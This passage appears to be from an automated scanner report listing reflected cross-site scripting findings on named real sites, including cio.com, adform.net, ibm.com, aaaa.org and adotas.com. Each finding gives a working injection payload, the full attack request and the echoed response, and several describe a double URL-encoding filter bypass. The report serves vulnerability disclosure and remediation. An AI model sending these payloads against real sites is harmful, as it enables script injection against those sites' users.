Path:   /show/51117387/00026040004262CIOJFKVLDIMHW/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 573c4%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5cd3158d9e7 was submitted in the REST URL parameter 2. This input was echoed as 573c4"><script>alert(1)</script>5cd3158d9e7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /show/573c4%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5cd3158d9e7/00026040004262CIOJFKVLDIMHW/ HTTP/1.1
Host: resources.cio.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 16 Dec 2010 14:14:27 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.5
ETag: "0e47d56a9d904745ab874d37c8e456fb"
X-Runtime: 107
Cache-Control: private, max-age=0, must-revalidate
Content-Length: 3825
Status: 200
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Con
...[SNIP]...
<iframe src="http://www.accelacomm.com/jaw/00026040004262CIOJFKVLDIMHW/7/573c4"><script>alert(1)</script>5cd3158d9e7/" width="700" height="1450" style="position:relative;left:0px;top:0px;" frameborder="no" border="0" marginheight="0" marginwidth="0" scrolling="no">
...[SNIP]...

2.286. http://resources.cio.com/show/51117387/00026040004262CIOJFKVLDIMHW/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://resources.cio.com
Path:   /show/51117387/00026040004262CIOJFKVLDIMHW/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a4fb4%2522%253balert%25281%2529%252f%252fc285f21ee99 was submitted in the REST URL parameter 2. This input was echoed as a4fb4";alert(1)//c285f21ee99 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /show/51117387a4fb4%2522%253balert%25281%2529%252f%252fc285f21ee99/00026040004262CIOJFKVLDIMHW/ HTTP/1.1
Host: resources.cio.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 16 Dec 2010 14:14:28 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.5
ETag: "5179d1964412b6839034b6d542127593"
X-Runtime: 57
Cache-Control: private, max-age=0, must-revalidate
Content-Length: 3811
Status: 200
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Con
...[SNIP]...
<script type="text/javascript">
           var reg_url = "http://www.accelacomm.com/jaw/00026040004262CIOJFKVLDIMHW/7/51117387a4fb4";alert(1)//c285f21ee99/" + "&elqguid=" + elqCustomerGUID;
           document.write('<iframe src="'+ reg_url +'" width="700" height="1450" style="position:relative;left:0px;top:0px;" frameborder="no" border="0" marginheight="0" ma
...[SNIP]...

2.287. http://resources.cio.com/show/51117387/00026040004262CIOJFKVLDIMHW/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://resources.cio.com
Path:   /show/51117387/00026040004262CIOJFKVLDIMHW/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 168f1%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3260104c6d0 was submitted in the REST URL parameter 3. This input was echoed as 168f1"><script>alert(1)</script>3260104c6d0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /show/51117387/168f1%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3260104c6d0/ HTTP/1.1
Host: resources.cio.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 16 Dec 2010 14:14:36 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.5
ETag: "7a11d34fd5df2415f71fead68d287463"
X-Runtime: 7
Cache-Control: private, max-age=0, must-revalidate
Content-Length: 3787
Status: 200
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Con
...[SNIP]...
<iframe src="http://www.accelacomm.com/jaw/168f1"><script>alert(1)</script>3260104c6d0/7/51117387/" width="700" height="1450" style="position:relative;left:0px;top:0px;" frameborder="no" border="0" marginheight="0" marginwidth="0" scrolling="no">
...[SNIP]...

2.288. http://resources.cio.com/show/51117387/00026040004262CIOJFKVLDIMHW/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://resources.cio.com
Path:   /show/51117387/00026040004262CIOJFKVLDIMHW/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 59c78%2522%253balert%25281%2529%252f%252f078199a6681 was submitted in the REST URL parameter 3. This input was echoed as 59c78";alert(1)//078199a6681 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /show/51117387/00026040004262CIOJFKVLDIMHW59c78%2522%253balert%25281%2529%252f%252f078199a6681/ HTTP/1.1
Host: resources.cio.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 16 Dec 2010 14:14:37 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.5
ETag: "b1fb384fb96c7586e2697ba044fa57cb"
X-Runtime: 6
Cache-Control: private, max-age=0, must-revalidate
Content-Length: 3811
Status: 200
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Con
...[SNIP]...
<script type="text/javascript">
           var reg_url = "http://www.accelacomm.com/jaw/00026040004262CIOJFKVLDIMHW59c78";alert(1)//078199a6681/7/51117387/" + "&elqguid=" + elqCustomerGUID;
           document.write('<iframe src="'+ reg_url +'" width="700" height="1450" style="position:relative;left:0px;top:0px;" frameborder="no" border="0" marginhe
...[SNIP]...

2.289. http://track.adform.net/adfscript/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://track.adform.net
Path:   /adfscript/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload af3bc<script>alert(1)</script>a056544fd55 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adfscript/?af3bc<script>alert(1)</script>a056544fd55=1 HTTP/1.1
Host: track.adform.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: uid=6773413839606691049; C=1; cid=6773413839606691049,0,0,0,0;

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 16 Dec 2010 14:16:49 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR NID CURa ADMa DEVa TAIa PSAa PSDa OUR LEG NAV INT"
X-Powered-By: ASP.NET
Content-Length: 483
Content-Type: text/javascript
Expires: Thu, 16 Dec 2010 14:31:49 GMT
Cache-control: private


Adform=window.Adform||{};Adform.host="http://track.adform.net";Adform.ADFBannerData={URL:"http://track.adform.net/adfserve/?af3bc<script>alert(1)</script>a056544fd55=1",CREFURL:"",BN:""};
if(!Adform.ADFBannerParams)Adform.ADFBannerParams=[];Adform.ADFBannerParams.push(Adform.ADFBannerData);
typeof Adform.ADFUtilInstance=="undefined"?document.write('<scr'+'ipt ty
...[SNIP]...

2.290. http://www-304.ibm.com/jct03001c/services/learning/ites.wss/us/en [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www-304.ibm.com
Path:   /jct03001c/services/learning/ites.wss/us/en

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cbb85"><img%20src%3da%20onerror%3dalert(1)>ce95d2d6793 was submitted in the REST URL parameter 5. This input was echoed as cbb85"><img src=a onerror=alert(1)>ce95d2d6793 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /jct03001c/services/learning/ites.wss/uscbb85"><img%20src%3da%20onerror%3dalert(1)>ce95d2d6793/en HTTP/1.1
Host: www-304.ibm.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
connection: close
content-language: en-US
content-type: text/html; charset=UTF-8
date: Thu, 16 Dec 2010 14:08:29 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server/6.1.0.27 Apache/2.0.47
x-old-content-length: 11184
cache-control: no-cache="set-cookie, set-cookie2"
expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0001yZpiLh_UPLdRUAqdZCqsEJj:13ac135kr; Path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-USCBB85"><IMG SRC=A ONERROR=ALERT(1)>CE95D2D6793" lang="en-USCBB85">
...[SNIP]...

2.291. http://www-304.ibm.com/jct03001c/services/learning/ites.wss/us/en [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www-304.ibm.com
Path:   /jct03001c/services/learning/ites.wss/us/en

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4413c"><img%20src%3da%20onerror%3dalert(1)>04f3725b37f was submitted in the REST URL parameter 6. This input was echoed as 4413c"><img src=a onerror=alert(1)>04f3725b37f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /jct03001c/services/learning/ites.wss/us/en4413c"><img%20src%3da%20onerror%3dalert(1)>04f3725b37f HTTP/1.1
Host: www-304.ibm.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
connection: close
content-language: en-US
content-type: text/html; charset=UTF-8
date: Thu, 16 Dec 2010 14:08:33 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server/6.1.0.27 Apache/2.0.47
x-old-content-length: 11138
cache-control: no-cache="set-cookie, set-cookie2"
expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=00016Y5lBciWwuc73DZoHf_nE8B:13ac135kr; Path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en4413c"><img src=a onerror=alert(1)>04f3725b37f-US" lang="en4413c">
...[SNIP]...

2.292. http://www-304.ibm.com/jct03001c/services/learning/ites.wss/zz/en [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www-304.ibm.com
Path:   /jct03001c/services/learning/ites.wss/zz/en

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0b3f"><img%20src%3da%20onerror%3dalert(1)>0f4699bc14f was submitted in the REST URL parameter 5. This input was echoed as f0b3f"><img src=a onerror=alert(1)>0f4699bc14f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /jct03001c/services/learning/ites.wss/zzf0b3f"><img%20src%3da%20onerror%3dalert(1)>0f4699bc14f/en HTTP/1.1
Host: www-304.ibm.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
connection: close
content-language: en-US
content-type: text/html; charset=UTF-8
date: Thu, 16 Dec 2010 14:08:30 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server/6.1.0.27 Apache/2.0.47
x-old-content-length: 11184
cache-control: no-cache="set-cookie, set-cookie2"
expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0001xoF-An8FzUquT3QhHWjDT-s:13ac1377u; Path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-ZZF0B3F"><IMG SRC=A ONERROR=ALERT(1)>0F4699BC14F" lang="en-ZZF0B3F">
...[SNIP]...

2.293. http://www-304.ibm.com/jct03001c/services/learning/ites.wss/zz/en [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www-304.ibm.com
Path:   /jct03001c/services/learning/ites.wss/zz/en

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9447"><img%20src%3da%20onerror%3dalert(1)>766c6ad99cd was submitted in the REST URL parameter 6. This input was echoed as f9447"><img src=a onerror=alert(1)>766c6ad99cd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /jct03001c/services/learning/ites.wss/zz/enf9447"><img%20src%3da%20onerror%3dalert(1)>766c6ad99cd HTTP/1.1
Host: www-304.ibm.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
connection: close
content-language: en-US
content-type: text/html; charset=UTF-8
date: Thu, 16 Dec 2010 14:07:28 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server/6.1.0.27 Apache/2.0.47
x-old-content-length: 11136
cache-control: no-cache="set-cookie, set-cookie2"
expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=00014FS_lcEdJ2JsRqcMBi4XSt3:13ac135kr; Path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="enf9447"><img src=a onerror=alert(1)>766c6ad99cd-ZZ" lang="enf9447">
...[SNIP]...

2.294. http://www.aaaa.org/pages/eweb.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aaaa.org
Path:   /pages/eweb.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b9756'%3balert(1)//d0ad3027f6d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b9756';alert(1)//d0ad3027f6d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /pages/eweb.aspx?b9756'%3balert(1)//d0ad3027f6d=1 HTTP/1.1
Host: www.aaaa.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 16 Dec 2010 13:37:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private, max-age=0
Expires: Wed, 01 Dec 2010 13:37:43 GMT
Last-Modified: Thu, 16 Dec 2010 13:37:43 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 33630


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" di
...[SNIP]...
ht) {
document.getElementById('eWebFrame').style.height = parseInt(height) + "px";
}
//Set the initial src of the iFrame
var frmSrc = 'http://ams.aaaa.org/eWeb/DynamicPage.aspx?b9756';alert(1)//d0ad3027f6d=1';

var posPound = frmSrc.indexOf('?');
var urlLeft = frmSrc.substring(0, posPound + 1);

if (window.location.href.indexOf('#') >
...[SNIP]...

2.295. https://www.aaaa.org/pages/eweb.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aaaa.org
Path:   /pages/eweb.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 23515'%3balert(1)//3901cee2e8f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 23515';alert(1)//3901cee2e8f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /pages/eweb.aspx?23515'%3balert(1)//3901cee2e8f=1 HTTP/1.1
Host: www.aaaa.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=93399053.1292507154.2.2.utmcsr=aaaa.org|utmccn=(referral)|utmcmd=referral|utmcct=/pages/eweb.aspx; __utma=93399053.178918647.1292504938.1292504938.1292507154.2; __utmc=93399053; __utmb=93399053.2.10.1292507154;

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 16 Dec 2010 14:09:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private, max-age=0
Expires: Wed, 01 Dec 2010 14:09:50 GMT
Last-Modified: Thu, 16 Dec 2010 14:09:50 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 33632


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" di
...[SNIP]...
ht) {
document.getElementById('eWebFrame').style.height = parseInt(height) + "px";
}
//Set the initial src of the iFrame
var frmSrc = 'http://ams.aaaa.org/eWeb/DynamicPage.aspx?23515';alert(1)//3901cee2e8f=1';

var posPound = frmSrc.indexOf('?');
var urlLeft = frmSrc.substring(0, posPound + 1);

if (window.location.href.indexOf('#') >
...[SNIP]...

2.296. http://www.adotas.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.adotas.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d47bf"><script>alert(1)</script>af053186cf7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d47bf\"><script>alert(1)</script>af053186cf7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?d47bf"><script>alert(1)</script>af053186cf7=1 HTTP/1.1
Host: www.adotas.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 16 Dec 2010 13:17:05 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
X-Pingback: http://www.adotas.com/wp/xmlrpc.php
Cache-Control: max-age=7200
Expires: Thu, 16 Dec 2010 15:17:05 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 77988

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...
<a href="http://www.adotas.com/wp/wp-content/wp-recommend/recommend.popup.php?url=http://www.adotas.com//?d47bf\"><script>alert(1)</script>af053186cf7=1" onclick="NewWindow(this.href,'Adotas','450','450','no','center');return false" onfocus="this.blur()">
...[SNIP]...

2.297. http://www.adotas.com/2010/12/doubleverify-to-deliver-forward-is-with-verification/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.adotas.com
Path:   /2010/12/doubleverify-to-deliver-forward-is-with-verification/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a532"><script>alert(1)</script>37045e53b7d was submitted in the REST URL parameter 3. This input was echoed as 4a532\"><script>alert(1)</script>37045e53b7d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /2010/12/doubleverify-to-deliver-forward-is-with-verification4a532"><script>alert(1)</script>37045e53b7d/ HTTP/1.1
Host: www.adotas.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=47048311.1018667347.1292504930.1292504930.1292504930.1; __utmb=47048311; __utmc=47048311; __utmz=47048311.1292504930.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 16 Dec 2010 13:26:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
X-Pingback: http://www.adotas.com/wp/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 16 Dec 2010 13:26:21 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 61626

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <meta http-equiv="refresh
...[SNIP]...
<a href="/2010/12/doubleverify-to-deliver-forward-is-with-verification4a532\"><script>alert(1)</script>37045e53b7d/?print_friendly=1">
...[SNIP]...

2.298. http://www.adotas.com/about/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.adotas.com
Path:   /about/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47e98"><script>alert(1)</script>a5375d23475 was submitted in the REST URL parameter 1. This input was echoed as 47e98\"><script>alert(1)</script>a5375d23475 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /about47e98"><script>alert(1)</script>a5375d23475/ HTTP/1.1
Host: www.adotas.com
Proxy-Connection: keep-alive
Referer: http://research.adotas.com/?option=com_categoryreport&task=viewabstract&pathway=no&autodn=1&title=11093&crv=9679&src=12&tgt=127&cmp=2748&yld=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmc=47048311; __utmz=47048311.1292504930.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utmb=47048311; __utma=47048311.1018667347.1292504930.1292504930.1292504930.1

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 16 Dec 2010 13:23:26 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
X-Pingback: http://www.adotas.com/wp/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 16 Dec 2010 13:23:26 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 61461

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <meta http-equiv="refresh
...[SNIP]...
<a href="/about47e98\"><script>alert(1)</script>a5375d23475/?print_friendly=1">
...[SNIP]...

2.299. http://www.adotas.com/wp/wp-content/plugins/flash-album-gallery/admin/js/swfaddress.js [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.adotas.com
Path:   /wp/wp-content/plugins/flash-album-gallery/admin/js/swfaddress.js

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88818"><script>alert(1)</script>193e7aea90 was submitted in the REST URL parameter 6. This input was echoed as 88818\"><script>alert(1)</script>193e7aea90 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /wp/wp-content/plugins/flash-album-gallery/admin/js88818"><script>alert(1)</script>193e7aea90/swfaddress.js HTTP/1.1
Host: www.adotas.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
